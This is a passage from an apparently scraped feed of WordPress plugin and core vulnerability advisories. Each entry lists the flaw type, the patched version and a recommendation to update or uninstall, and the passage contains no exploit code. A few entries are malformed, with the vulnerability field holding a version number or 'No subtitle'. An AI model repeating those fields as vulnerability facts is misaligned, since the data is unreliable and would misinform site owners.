Plugin: WP Custom Cursors | WordPress Cursor Plugin

Vulnerability: Cross-Site Request Forgery
Patched Version: 3.2
Recommended Action: Update to version 3.2, or a newer patched version

Plugin: WP Tiles

Vulnerability: Authenticated (Subscriber+) Sensitive Information Exposure
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: SagePay Server Gateway for WooCommerce

Vulnerability: Cross-Site Scripting
Patched Version: 1.0.9
Recommended Action: Update to version 1.0.9, or a newer patched version

Plugin: Dear Flipbook – PDF Flipbook, 3D Flipbook, PDF embed, PDF viewer

Vulnerability: Contributor+ Stored Cross-Site Scripting
Patched Version: 1.7.13
Recommended Action: Update to version 1.7.13, or a newer patched version

Plugin: Flexible Captcha

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: LoginPress | wp-login Custom Login Page Customizer

Vulnerability: Unauthorized Settings Update
Patched Version: 1.1.14
Recommended Action: Update to version 1.1.14, or a newer patched version

Plugin: Splashing Images

Vulnerability: PHP Object Injection
Patched Version: 2.1.1
Recommended Action: Update to version 2.1.1, or a newer patched version

Plugin: SMTP Mail

Vulnerability: SQL Injection
Patched Version: 1.2.2
Recommended Action: Update to version 1.2.2, or a newer patched version

Plugin: No CAPTCHA reCAPTCHA for WooCommerce

Vulnerability: Missing Authorization to Notification Dismissal
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Events Manager – Calendar, Bookings, Tickets, and more!

Vulnerability: Multiple Cross-Site Scripting
Patched Version: 5.3.6.1
Recommended Action: Update to version 5.3.6.1, or a newer patched version

Plugin: Corner Ad

Vulnerability: Cross-Site Scripting
Patched Version: 1.0.8
Recommended Action: Update to version 1.0.8, or a newer patched version

Plugin: Watu Quiz

Vulnerability: Stored Cross-Site Scripting
Patched Version: 2.5.0.2
Recommended Action: Update to version 2.5.0.2, or a newer patched version

Plugin: Forminator Forms – Contact Form, Payment Form & Custom Form Builder

Vulnerability: Cross-Site Scripting
Patched Version: 1.6
Recommended Action: Update to version 1.6, or a newer patched version

Plugin: Product Table by WBW

Vulnerability: Cross-Site Request Forgery via saveGroup
Patched Version: 1.8.7
Recommended Action: Update to version 1.8.7, or a newer patched version

Plugin: Crayon Syntax Highlighter

Vulnerability: Remote File Inclusion
Patched Version: 1.14
Recommended Action: Update to version 1.14, or a newer patched version

Plugin: Uploading SVG, WEBP and ICO files

Vulnerability: Authenticated (Author+) Stored Cross-Site Scripting via SVG
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Patreon WordPress

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: 1.8.2
Recommended Action: Update to version 1.8.2, or a newer patched version

Plugin: AdSanity

Vulnerability: Authenticated Arbitrary File Upload
Patched Version: 1.8.2
Recommended Action: Update to version 1.8.2, or a newer patched version

Plugin: WP Maintenance

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 6.0.6
Recommended Action: Update to version 6.0.6, or a newer patched version

Plugin: Support Tickets Center

Vulnerability: Sensitive Information Disclosure
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: MStore API – Create Native Android & iOS Apps On The Cloud

Vulnerability: Authentication Bypass
Patched Version: 3.9.3
Recommended Action: Update to version 3.9.3, or a newer patched version

Plugin: Easy Social Icons

Vulnerability: Cross-Site Request Forgery to Stored Cross-Site Scripting
Patched Version: 1.2.3
Recommended Action: Update to version 1.2.3, or a newer patched version

Plugin: SpiderCalendar

Vulnerability: Unauthenticated SQL Injection
Patched Version: 1.4.10
Recommended Action: Update to version 1.4.10, or a newer patched version

Plugin: Image Hover Effects Ultimate (Image Gallery, Effects, Lightbox, Comparison or Magnifier)

Vulnerability: 9.8.4
Patched Version: 9.8.5
Recommended Action: Update to version 9.8.5, or a newer patched version

Plugin: Ninja Forms – File Uploads

Vulnerability: File Uploads Extension <= 3.3.0
Patched Version: 3.3.1
Recommended Action: Update to version 3.3.1, or a newer patched version

Plugin: Customer Reviews for WooCommerce

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 5.17.0
Recommended Action: Update to version 5.17.0, or a newer patched version

Plugin: Malware Scanner

Vulnerability: Cross-Site Scripting
Patched Version: 4.5.2
Recommended Action: Update to version 4.5.2, or a newer patched version

Plugin: Booster for WooCommerce

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 7.1.3
Recommended Action: Update to version 7.1.3, or a newer patched version

Plugin: Seriously Simple Podcasting

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.16.1
Recommended Action: Update to version 2.16.1, or a newer patched version

Plugin: Modula Image Gallery

Vulnerability: Incomplete Authorization via ‘save_image’ and ‘save_images’
Patched Version: 2.7.5
Recommended Action: Update to version 2.7.5, or a newer patched version

Plugin: JetFormBuilder — Dynamic Blocks Form Builder

Vulnerability: Unauthenticated Content Injection
Patched Version: 3.1.5
Recommended Action: Update to version 3.1.5, or a newer patched version

Plugin: SendPress Newsletters

Vulnerability: Missing Authorization
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Subscribe to Category

Vulnerability: Missing Authorization
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: ZdStatistics

Vulnerability: Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Lazyest Backup

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 0.2.2
Recommended Action: Update to version 0.2.2, or a newer patched version

Plugin: JCH Optimize

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting via admin settings
Patched Version: 3.2.3
Recommended Action: Update to version 3.2.3, or a newer patched version

Plugin: Inline Google Spreadsheet Viewer

Vulnerability: Cross-Site Request Forgery
Patched Version: 0.9.6.1
Recommended Action: Update to version 0.9.6.1, or a newer patched version

Plugin: Schedule Post Changes With PublishPress Future: Unpublish, Delete, Change Status, Trash, Change Categories

Vulnerability: Contributor+ Arbitrary Post Schedule Deletion
Patched Version: 2.6.0
Recommended Action: Update to version 2.6.0, or a newer patched version

Plugin: Gallery Plugin for WordPress – Envira Photo Gallery

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: 1.7.7
Recommended Action: Update to version 1.7.7, or a newer patched version

Plugin: PressForward

Vulnerability: Cross-Site Scripting
Patched Version: 5.2.9
Recommended Action: Update to version 5.2.9, or a newer patched version

Plugin: Backup, Restore and Migrate your sites with XCloner

Vulnerability: Cross-Site Scripting
Patched Version: 3.1.3
Recommended Action: Update to version 3.1.3, or a newer patched version

Plugin: Mingle Forum

Vulnerability: SQL Injection
Patched Version: 1.0.33
Recommended Action: Update to version 1.0.33, or a newer patched version

Plugin: AdRotate Banner Manager – The only ad manager you'll need

Vulnerability: Cross-Site Request Forgery
Patched Version: 5.9.1
Recommended Action: Update to version 5.9.1, or a newer patched version

Core: WordPress

Vulnerability: Information Disclosure (Email Address)
Patched Version: 3.7.40
Recommended Action: Update to one of the following versions, or a newer patched version: 3.7.40, 3.8.40, 3.9.38, 4.0.37, 4.1.37, 4.2.34, 4.3.30, 4.4.29, 4.5.28, 4.6.25, 4.7.25, 4.8.21, 4.9.22, 5.0.18, 5.1.15, 5.2.17, 5.3.14, 5.4.12, 5.5.11, 5.6.10, 5.7.8, 5.8.6, 5.9.5, 6.0.3

Plugin: Slideshow, Image Slider by 2J

Vulnerability: Authorization Bypass
Patched Version: 1.3.33
Recommended Action: Update to version 1.3.33, or a newer patched version

Plugin: Search in Place

Vulnerability: Cross-Site Request Forgery to Feedback Submission
Patched Version: 1.0.105
Recommended Action: Update to version 1.0.105, or a newer patched version

Plugin: Sitemap by click5

Vulnerability: Unauthenticated Arbitrary Options Update
Patched Version: 1.0.36
Recommended Action: Update to version 1.0.36, or a newer patched version

Plugin: Ezoic

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 2.8.9
Recommended Action: Update to version 2.8.9, or a newer patched version

Plugin: AccessPress Social Icons

Vulnerability: Author+ SQL Injection
Patched Version: 1.8.1
Recommended Action: Update to version 1.8.1, or a newer patched version

Plugin: Email Before Download

Vulnerability: Admin+ SQL Injection
Patched Version: 6.8
Recommended Action: Update to version 6.8, or a newer patched version

Plugin: Related Posts, Inline Related Posts, Contextual Related Posts, Related Content By PickPlugins

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 2.0.54
Recommended Action: Update to version 2.0.54, or a newer patched version

Plugin: Gutenberg Blocks by WordPress Download Manager

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcodes
Patched Version: 2.1.9
Recommended Action: Update to version 2.1.9, or a newer patched version

Plugin: Captain Slider

Vulnerability: Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Pricing Tables WordPress Plugin – Easy Pricing Tables

Vulnerability: Author+ Stored Cross-Site Scripting
Patched Version: 3.1.3
Recommended Action: Update to version 3.1.3, or a newer patched version

Plugin: Cool Video Gallery

Vulnerability: Authenticated Command Injection
Patched Version: 2.0
Recommended Action: Update to version 2.0, or a newer patched version

Plugin: 10Web Map Builder for Google Maps

Vulnerability: Unauthenticated SQL Injection
Patched Version: 1.0.73
Recommended Action: Update to version 1.0.73, or a newer patched version

Plugin: Mang Board WP

Vulnerability: SQL Injection
Patched Version: 2.0.0
Recommended Action: Update to version 2.0.0, or a newer patched version

Plugin: Social Media Widget

Vulnerability: Arbitrary File Upload
Patched Version: 4.0.1
Recommended Action: Update to version 4.0.1, or a newer patched version

Plugin: Top 10 – WordPress Popular posts by WebberZone

Vulnerability: Cross-Site Request Forgery Bypass
Patched Version: 2.9.5
Recommended Action: Update to version 2.9.5, or a newer patched version

Plugin: WP Booking Calendar

Vulnerability: Cross-Site Request Forgery
Patched Version: 4.1.6
Recommended Action: Update to version 4.1.6, or a newer patched version

Plugin: Deny All Firewall

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.1.7
Recommended Action: Update to version 1.1.7, or a newer patched version

Plugin: WooCommerce Checkout & Funnel Builder by CartFlows – Create High Converting Stores For WooCommerce

Vulnerability: Arbitrary Plugin Activation
Patched Version: 1.3.1
Recommended Action: Update to version 1.3.1, or a newer patched version

Plugin: vSlider Multi Image Slider for WordPress

Vulnerability: Missing Authorization
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Daily Prayer Time

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via shortcode
Patched Version: 2023.10.21
Recommended Action: Update to version 2023.10.21, or a newer patched version

Plugin: event-espresso-core

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 4.10.7.p
Recommended Action: Update to version 4.10.7.p, or a newer patched version

Plugin: Easy Digital Downloads – Wish Lists

Vulnerability: Cross-Site Scripting
Patched Version: 1.1.1
Recommended Action: Update to version 1.1.1, or a newer patched version

Plugin: Preview E-mails for WooCommerce

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.0.0
Recommended Action: Update to version 2.0.0, or a newer patched version

Plugin: Photo Gallery, Sliders, Proofing and Themes – NextGEN Gallery

Vulnerability: Remote File Inclusion
Patched Version: 2.1.57
Recommended Action: Update to version 2.1.57, or a newer patched version

Plugin: Timthumb Vulnerability Scanner

Vulnerability: Cross-Site Request Forgery
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: BackupBuddy

Vulnerability: Authentication Bypass
Patched Version: 3.0
Recommended Action: Update to version 3.0, or a newer patched version

Plugin: Nirweb support

Vulnerability: SQL Injection
Patched Version: 2.8.2
Recommended Action: Update to version 2.8.2, or a newer patched version

Plugin: Ads Invalid Click Protection

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Advanced Import : One Click Import for WordPress or Theme Demo Data

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.3.8
Recommended Action: Update to version 1.3.8, or a newer patched version

Plugin: JQuery Html5 File Upload

Vulnerability: Unauthenticated Arbitrary File Upload
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Product Recommendation Quiz for eCommerce

Vulnerability: Missing Authorization in prq_set_token
Patched Version: 2.1.2
Recommended Action: Update to version 2.1.2, or a newer patched version

Plugin: Ultimate Addons for Contact Form 7

Vulnerability: Unauthenticated SQL Injection via form_id
Patched Version: 3.1.24
Recommended Action: Update to version 3.1.24, or a newer patched version

Plugin: WP Go Maps (formerly WP Google Maps)

Vulnerability: Cross-Site Request Forgery
Patched Version: 7.11.28
Recommended Action: Update to version 7.11.28, or a newer patched version

Core: WordPress

Vulnerability: Stored Cross-Site Scripting via theme directory name
Patched Version: 3.7.17
Recommended Action: Update to one of the following versions, or a newer patched version: 3.7.17, 3.8.17, 3.9.15, 4.0.14, 4.1.14, 4.2.11, 4.3.7, 4.4.6, 4.5.5, 4.6.2, 4.7.1

Plugin: WP Job Portal – A Complete Recruitment System for Company or Job Board website

Vulnerability: Authenticated (Subscriber+) Stored Cross-Site Scripting
Patched Version: 2.0.6
Recommended Action: Update to version 2.0.6, or a newer patched version

Plugin: Social Feed | Custom Feed for Social Media Networks

Vulnerability: Reflected Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WordPress Flash Uploader

Vulnerability: Arbitrary Command Execution
Patched Version: 3.1.3
Recommended Action: Update to version 3.1.3, or a newer patched version

Plugin: Auto Prune Posts

Vulnerability: Cross-Site Request Forgery via admin_menu
Patched Version: 2.0.0
Recommended Action: Update to version 2.0.0, or a newer patched version

Plugin: WP-DownloadManager

Vulnerability: Stored Cross-Site Scripting
Patched Version: 1.68.7
Recommended Action: Update to version 1.68.7, or a newer patched version

Plugin: Build App Online

Vulnerability: Unauthenticated SQL Injection
Patched Version: 1.0.19
Recommended Action: Update to version 1.0.19, or a newer patched version

Plugin: Team Circle Image Slider With Lightbox

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.0.16
Recommended Action: Update to version 1.0.16, or a newer patched version

Plugin: Yoast SEO

Vulnerability: Full Path Disclosure
Patched Version: 17.3
Recommended Action: Update to version 17.3, or a newer patched version

Plugin: Night Mode

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 1.4.0
Recommended Action: Update to version 1.4.0, or a newer patched version

Plugin: CSS JS Manager, Async JavaScript, Defer Render Blocking CSS supports WooCommerce

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.4.49.1
Recommended Action: Update to version 2.4.49.1, or a newer patched version

Plugin: System Dashboard

Vulnerability: Missing Authorization to Information Disclosure (sd_constants)
Patched Version: 2.8.8
Recommended Action: Update to version 2.8.8, or a newer patched version

Plugin: Photos, Files, YouTube, Twitter, Instagram, TikTok, Ecommerce Contest Gallery – Upload, Vote, Sell via PayPal, Social Share Buttons

Vulnerability: Authenticated (Author+) SQL Injection via addCountS
Patched Version: 19.1.5
Recommended Action: Update to version 19.1.5, or a newer patched version

Plugin: Otter Blocks – Gutenberg Blocks, Page Builder for Gutenberg Editor & FSE

Vulnerability: Gutenberg Blocks <= 2.2.5
Patched Version: 2.2.6
Recommended Action: Update to version 2.2.6, or a newer patched version

Plugin: Order date, Order pickup, Order date time, Pickup Location, delivery date for WooCommerce

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 3.0.20
Recommended Action: Update to version 3.0.20, or a newer patched version

Plugin: Delete Post Revisions In WordPress

Vulnerability: Cross-Site Request Forgery
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Table Field Add-on for SCF and ACF

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: 1.1.13
Recommended Action: Update to version 1.1.13, or a newer patched version

Plugin: WooCommerce Builder & Gutenberg WooCommerce Blocks – WowStore

Vulnerability: Missing Authorization via option_data_save
Patched Version: 3.0.0
Recommended Action: Update to version 3.0.0, or a newer patched version

Plugin: Web Invoice – Invoicing and billing for WordPress

Vulnerability: Authenticated SQL Injection
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WP Synchro – WordPress Migration Plugin for Database & Files

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.10.0
Recommended Action: Update to version 1.10.0, or a newer patched version

Plugin: Custom Content Type Manager

Vulnerability: 0.9.8.8
Patched Version: 0.9.8.9
Recommended Action: Update to version 0.9.8.9, or a newer patched version

Plugin: Advanced Access Manager – Restricted Content, Users & Roles, Enhanced Security and More

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 6.9.19
Recommended Action: Update to version 6.9.19, or a newer patched version

Plugin: Retro Winamp Block

Vulnerability: Denial of Service
Patched Version: 1.2.0
Recommended Action: Update to version 1.2.0, or a newer patched version

Plugin: surveys

Vulnerability: Authenticated SQL Injection
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Deeper Comments

Vulnerability: Missing Authorization to Authenticated (Subscriber+) Arbitrary Options Update
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Chop Slider 3

Vulnerability: Unauthenticated SQL Injection
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: timelineoptinpro

Vulnerability: Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: User Email Verification for WooCommerce

Vulnerability: Authentication Bypass
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: filedownload

Vulnerability: Open Proxy
Patched Version: 2.0
Recommended Action: Update to version 2.0, or a newer patched version

Plugin: Advanced Custom Fields (ACF)

Vulnerability: Missing Authorization to Information Disclosure
Patched Version: 5.11
Recommended Action: Update to version 5.11, or a newer patched version

Plugin: CMP – Coming Soon & Maintenance Plugin by NiteoThemes

Vulnerability: Missing Authorization
Patched Version: 3.8.2
Recommended Action: Update to version 3.8.2, or a newer patched version

Plugin: WooCommerce

Vulnerability: Authenticated (Shop Manager+) Sensitive Information Exposure
Patched Version: 7.0.1
Recommended Action: Update to version 7.0.1, or a newer patched version

Plugin: Premium Addons Pro for Elementor

Vulnerability: Sensitive Information Exposure
Patched Version: 2.9.1
Recommended Action: Update to version 2.9.1, or a newer patched version

Plugin: Asset Manager

Vulnerability: Arbitrary File Upload
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Easy Digital Downloads – Free Downloads

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.3.7
Recommended Action: Update to version 2.3.7, or a newer patched version

Plugin: NewsPlugin

Vulnerability: No subtitle
Patched Version: 1.1.0
Recommended Action: Update to version 1.1.0, or a newer patched version

Plugin: bbPress

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting via the forums list table
Patched Version: 2.6.5
Recommended Action: Update to version 2.6.5, or a newer patched version

Plugin: o2s gallery

Vulnerability: Reflected Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Ceceppa Multilingua

Vulnerability: Reflected Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Modern Events Calendar Lite

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 7.1.0
Recommended Action: Update to version 7.1.0, or a newer patched version

Core: WordPress

Vulnerability: Cross-Site Scripting via Customizer
Patched Version: 3.7.21
Recommended Action: Update to one of the following versions, or a newer patched version: 3.7.21, 3.8.21, 3.9.19, 4.0.18, 4.1.18, 4.2.15, 4.3.11, 4.4.10, 4.5.9, 4.6.6, 4.7.5

Plugin: Pricing Table Plugin

Vulnerability: < 2.3
Patched Version: 2.3
Recommended Action: Update to version 2.3, or a newer patched version

Plugin: Events Manager – Calendar, Bookings, Tickets, and more!

Vulnerability: Cross-Site Scripting
Patched Version: 5.9.8
Recommended Action: Update to version 5.9.8, or a newer patched version

Plugin: Ivory Search – WordPress Search Plugin

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 4.7
Recommended Action: Update to version 4.7, or a newer patched version

Plugin: Modern Events Calendar Lite

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 6.5.2
Recommended Action: Update to version 6.5.2, or a newer patched version

Plugin: BulletProof Security

Vulnerability: Authenticated Cross-Site Scripting
Patched Version: .53.4
Recommended Action: Update to version .53.4, or a newer patched version

Plugin: Timely All-in-One Events Calendar

Vulnerability: SQL Injection
Patched Version: 1.10
Recommended Action: Update to version 1.10, or a newer patched version

Plugin: Gravity Forms

Vulnerability: Cross-Site Scripting
Patched Version: 1.9.7
Recommended Action: Update to version 1.9.7, or a newer patched version

Plugin: Ultimate Member – User Profile, Registration, Login, Member Directory, Content Restriction & Membership Plugin

Vulnerability: Directory Traversal
Patched Version: 2.0.4
Recommended Action: Update to version 2.0.4, or a newer patched version

Plugin: DTracker

Vulnerability: Missing Authorization
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Sell Downloads

Vulnerability: Improper Input Validation
Patched Version: 1.0.8
Recommended Action: Update to version 1.0.8, or a newer patched version

Plugin: Bravo Translate

Vulnerability: Authenticated (Administrator+) SQL Injection
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Flexi Quote Rotator

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Post SMTP – WordPress SMTP Plugin with Email Logs and Mobile App for Failure Notifications – Gmail SMTP, Office 365, Brevo, Mailgun, Amazon SES and more

Vulnerability: Unauthenticated Stored Cross-Site Scripting
Patched Version: 2.7.1
Recommended Action: Update to version 2.7.1, or a newer patched version

Plugin: Amazon Link

Vulnerability: Authenticated (Admin+) Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Core: WordPress

Vulnerability: Arbitrary Email Content Change
Patched Version: 1.5.1.3
Recommended Action: Update to version 1.5.1.3, or a newer patched version

Plugin: Booking calendar, Appointment Booking System

Vulnerability: Authenticated (Editor+) Stored Cross-Site Scripting
Patched Version: 3.2.4
Recommended Action: Update to version 3.2.4, or a newer patched version

Plugin: Contact Form Manager

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.4.2
Recommended Action: Update to version 1.4.2, or a newer patched version

Plugin: CP Contact Form with PayPal

Vulnerability: Cross-Site Scripting
Patched Version: 1.3.02
Recommended Action: Update to version 1.3.02, or a newer patched version

Plugin: Front-end Editor

Vulnerability: Arbitrary File Upload
Patched Version: 2.3
Recommended Action: Update to version 2.3, or a newer patched version

Plugin: WP Clictracker

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Redirection

Vulnerability: Cross-Site Request Forgery to Remote Code Execution
Patched Version: 3.6.4
Recommended Action: Update to version 3.6.4, or a newer patched version

Plugin: Ni WooCommerce Custom Order Status

Vulnerability: SQL Injection
Patched Version: 1.9.7
Recommended Action: Update to version 1.9.7, or a newer patched version

Plugin: JW Player for Flash & HTML5 Video

Vulnerability: Reflected Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Custom Post Type UI

Vulnerability: Cross-Site Request Forgery to Sensitive Information Exposure
Patched Version: 1.13.5
Recommended Action: Update to version 1.13.5, or a newer patched version

Plugin: Post Grid and Gutenberg Blocks – ComboBlocks

Vulnerability: Arbitrary File Deletion
Patched Version: 2.0.13
Recommended Action: Update to version 2.0.13, or a newer patched version

Plugin: Hermit 音乐播放器

Vulnerability: Multiple Cross-Site Request Forgery
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Formidable Forms – Contact Form Plugin, Survey, Quiz, Payment, Calculator Form & Custom Form Builder

Vulnerability: Authenticated (Admin+) Server-Side Request Forgery
Patched Version: 5.5.5
Recommended Action: Update to version 5.5.5, or a newer patched version

Plugin: SoundCloud Is Gold

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.3.2
Recommended Action: Update to version 2.3.2, or a newer patched version

Plugin: WP Booking System – Booking Calendar

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.0.15
Recommended Action: Update to version 2.0.15, or a newer patched version

Plugin: Freesoul Deactivate Plugins – Disable plugins on individual WordPress pages

Vulnerability: Cross-Site Request Forgery via eos_dp_pro_delete_transient
Patched Version: 2.1.4
Recommended Action: Update to version 2.1.4, or a newer patched version

Plugin: Clearpay Gateway for WooCommerce

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 3.5.1
Recommended Action: Update to version 3.5.1, or a newer patched version

Core: WordPress

Vulnerability: Cross-Site Scripting
Patched Version: 3.3.3
Recommended Action: Update to version 3.3.3, or a newer patched version

Plugin: Form Maker by 10Web – Mobile-Friendly Drag & Drop Contact Form Builder

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.13.40
Recommended Action: Update to version 1.13.40, or a newer patched version

Plugin: WPC Smart Wishlist for WooCommerce

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.9.9
Recommended Action: Update to version 2.9.9, or a newer patched version

Plugin: Flat Preloader

Vulnerability: Cross-Site Request Forgery to Stored Cross-Site Scripting
Patched Version: 1.5.4
Recommended Action: Update to version 1.5.4, or a newer patched version

Plugin: WP User Merger

Vulnerability: Authenticated (Admin+) SQL Injection
Patched Version: 1.5.3
Recommended Action: Update to version 1.5.3, or a newer patched version

Plugin: Paid Membership Plugin, Ecommerce, User Registration Form, Login Form, User Profile & Restrict Content – ProfilePress

Vulnerability: Reflected Cross-Site Scripting via ppress_cc_data Parameter
Patched Version: 3.2.3
Recommended Action: Update to version 3.2.3, or a newer patched version

Plugin: Photos, Files, YouTube, Twitter, Instagram, TikTok, Ecommerce Contest Gallery – Upload, Vote, Sell via PayPal, Social Share Buttons

Vulnerability: Cross-Site Request Forgery
Patched Version: 21.2.9
Recommended Action: Update to version 21.2.9, or a newer patched version

Plugin: weForms – Easy Drag & Drop Contact Form Builder For WordPress

Vulnerability: Missing Authorization via export_form_entries
Patched Version: 1.6.19
Recommended Action: Update to version 1.6.19, or a newer patched version

Plugin: Manual Purchases Add-on for iThemes Exchange

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.1.0
Recommended Action: Update to version 1.1.0, or a newer patched version

Plugin: Quiz and Survey Master (QSM) – Easy Quiz and Survey Maker

Vulnerability: Cross-Site Request Forgery
Patched Version: 7.3.7
Recommended Action: Update to version 7.3.7, or a newer patched version

Plugin: WP Config File Editor

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: No patched version available
